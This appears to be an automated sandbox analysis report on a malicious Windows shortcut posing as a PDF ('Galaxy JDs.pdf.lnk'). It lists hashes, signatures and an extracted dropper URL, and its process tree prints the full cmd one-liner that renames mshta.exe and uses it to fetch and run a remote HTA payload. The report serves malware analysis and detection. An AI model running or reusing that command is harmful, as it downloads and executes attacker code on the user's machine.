Overview

overview

10

Static

static

Galaxy JDs.pdf.lnk

windows7-x64

10

Galaxy JDs.pdf.lnk

windows10-1703-x64

10

Analysis

  • max time kernel
    394s
  • max time network
    867s
  • platform
    windows10-1703_x64
  • resource
    win10-20220901-en
  • resource tags

    arch:x64arch:x86image:win10-20220901-enlocale:en-usos:windows10-1703-x64system
  • submitted
    26-09-2022 11:25

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Galaxy JDs.pdf.lnk

  • Size

    363KB

  • MD5

    8878ee5d935facff0e04370324118c60

  • SHA1

    e09eda6f9ee4d2e30e239813e87423472d893396

  • SHA256

    3b70c3ebffcfd6a97859f8d9e5a31f6902756e23fd6688ca7c7446d24ec76d9d

  • SHA512

    e9e8e82126ee4e4a87b39ce60f48155724a8577c95e664de2e3d3c05e70f02bf30454d023832a58560befb695c359dd244923e929ded4414f9d0f93061343e46

  • SSDEEP

    6144:pPISi7Naj5ng6erydYtQfBpeSLh1J7qLESnJmlfYHeaSuNcVD8payTq6Z:pwSiKeryu2fBpe+R7q5JmlJui6pay2e

Score
10/10

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

https://fs.digiboxes.us/yq7dpQeWf6Bbu6jZsRiT8UdhrIB08fQGBxDPNulbHbg=

Signatures

  • Blocklisted process makes network request 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\Galaxy JDs.pdf.lnk"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4680
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /q /c type C:\Windows\system32\msh*.exe>C:\Users\Public\msh&ren C:\Users\Public\* *ta.exe&for %i IN (C:\Users\Public\ms*.exe) DO start /b %~ni "https://fs.digiboxes.us/yq7dpQeWf6Bbu6jZsRiT8UdhrIB08fQGBxDPNulbHbg="
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4904
      • C:\Windows\system32\mshta.exe
        mshta "https://fs.digiboxes.us/yq7dpQeWf6Bbu6jZsRiT8UdhrIB08fQGBxDPNulbHbg="
        3⤵
        • Blocklisted process makes network request
        PID:4176

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1
T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/4176-118-0x0000000000000000-mapping.dmp
    Download
  • memory/4904-117-0x0000000000000000-mapping.dmp
    Download